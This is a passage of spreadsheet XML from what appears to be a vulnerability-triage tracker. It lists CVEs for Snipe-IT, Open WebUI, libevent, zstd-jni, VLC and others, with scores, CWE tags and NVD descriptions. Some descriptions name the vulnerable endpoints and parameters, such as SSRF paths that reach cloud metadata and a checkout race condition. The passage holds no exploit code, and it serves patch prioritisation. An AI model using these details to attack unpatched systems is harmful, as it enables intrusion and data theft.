      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr"/>
      <c r="Q630" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to enforce checkout authorization when assignment fields are submitted to the asset update endpoint. Authenticated users with edit permission but explicitly denied checkout permission can reassign assets, bypass check-in procedures, and alter custody records by submitting assigned_user, assigned_asset, or assigned_location parameters to PATCH /api/v1/hardware/{id}.</t>
        </is>
      </c>
      <c r="S630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86765</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86766</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr"/>
      <c r="Q631" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions up to and including 8.6.3 contain a race condition (TOCTOU) in the consumable checkout API endpoint (POST /api/v1/consumables/{consumable_id}/checkout). The requested quantity is validated against the number of remaining units before the database transaction begins, and the transaction then creates the checkout records without locking the consumable row or re-checking availability. An authenticated user with permission to check out consumables can submit concurrent checkout requests for the same consumable so that both requests pass the availability check and succeed, over-allocating stock and driving the remaining inventory negative (e.g., a consumable with 1 remaining unit ends at -1 after two concurrent 1-unit checkouts). The issue is fixed in 8.7.0, which re-fetches the parent row under lockForUpdate inside the transaction and re-validates availability.</t>
        </is>
      </c>
      <c r="S631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86766</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87072</t>
        </is>
      </c>
      <c r="D632" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr"/>
      <c r="Q632" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87072</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D633" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M633" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr"/>
      <c r="Q633" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R633"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S633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87821</t>
        </is>
      </c>
      <c r="D634" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr"/>
      <c r="Q634" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard through 1.3.1 contains a server-side request forgery vulnerability in the POST /api/admin/builder/markdown/fetch endpoint that allows any authenticated user to fetch arbitrary URLs and read the response body. Attackers can read internal HTTP services and cloud metadata including IAM credentials by supplying malicious URLs without host validation or redirect restrictions.</t>
        </is>
      </c>
      <c r="S634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87821</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87998</t>
        </is>
      </c>
      <c r="D635" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr"/>
      <c r="Q635" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="R635" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/knowledge/{id}/delete in backend/open_webui/routers/knowledge.py authorized deletion against the knowledge base but then removed its administrator-owned external connection without a separate administrator check or a check for other dependent knowledge bases. A non-administrator with write access to one external knowledge base could delete shared instance configuration and make every other knowledge base using that connection unavailable. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87998</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87999</t>
        </is>
      </c>
      <c r="D636" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr"/>
      <c r="Q636" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R636" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87999</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54467</t>
        </is>
      </c>
      <c r="D637" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr"/>
      <c r="Q637" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>On the Trusted Firmware-M (TF-M) 2 through 2.3.0 platform before 00d1b3e, mailbox initialization on PSOC64 and RP2350 accepts a non-secure, unvalidated, supplied pointer.</t>
        </is>
      </c>
      <c r="S637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54467</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56711</t>
        </is>
      </c>
      <c r="D638" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr"/>
      <c r="Q638" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>VLC media player versions 3.0.0 through 3.0.23 contain a memory-safety vulnerability reachable when processing crafted media. Exploitation requires user interaction and may result in application termination or code execution with the privileges of the VLC process.</t>
        </is>
      </c>
      <c r="S638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56711</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63387</t>
        </is>
      </c>
      <c r="D639" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr"/>
      <c r="Q639" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an off-by-one stack buffer overflow in evdns.c when dnsname_to_labels formats a name-bearing DNS record at the end of the 64 KB stack buffer allocated by evdns_server_request_format_response. The final-label check permits j plus label_len plus one to equal buf_len, after which the terminating null byte is written to buf[buf_len]. A crafted DNS server response containing PTR, CNAME, MX, NS, or SOA data can trigger the one-byte out-of-bounds write and crash or corrupt the process. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63387</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79636</t>
        </is>
      </c>
      <c r="D640" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr"/>
      <c r="Q640" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="R640"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unauthorized access.</t>
        </is>
      </c>
      <c r="S640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79636</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87088</t>
        </is>
      </c>
      <c r="D641" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr"/>
      <c r="Q641" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87088</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87825</t>
        </is>
      </c>
      <c r="D642" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr"/>
      <c r="Q642" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 contains a use-after-free vulnerability where streams and contexts hold a dictionary's shared lock only during the load call, allowing the dictionary to be closed while still referenced. Attackers can close a dictionary after associating it with a stream or context, causing subsequent read or write operations to access freed native memory, resulting in silent data corruption or JVM crashes.</t>
        </is>
      </c>
      <c r="S642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87825</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87877</t>
        </is>
      </c>
      <c r="D643" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F643" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr"/>
      <c r="Q643" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R643" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate closed state in setDict, setLongMax, setLevel and setRefMultipleDDicts methods of stream classes. Attackers can call these methods on closed streams to write through freed native pointers, corrupting unrelated objects or crashing the JVM.</t>
        </is>
      </c>
      <c r="S643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87877</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71418</t>
        </is>
      </c>
      <c r="D644" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr"/>
      <c r="Q644" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R644" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.25.2 fail to limit the explode() function in packet parsing, allowing malicious clients to waste server resources. Attackers can send crafted packets with excessive delimiters to consume CPU and memory through sign editing, JWT parsing, and command parsing endpoints.</t>
        </is>
      </c>
      <c r="S644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71418</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21098</t>
        </is>
      </c>
      <c r="D645" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E645" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F645" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr"/>
      <c r="Q645" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R645" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Link to Windows prior to SMR Sep-2026 Release 1 allows local attackers to establish a connection with the PC without proper user interaction.</t>
        </is>
      </c>
      <c r="S645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21098</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21107</t>
        </is>
      </c>
      <c r="D646" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E646" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F646" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr"/>
      <c r="Q646" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R646" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Samsung Notes prior to version 4.4.45.5 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21107</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21108</t>
        </is>
      </c>
      <c r="D647" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
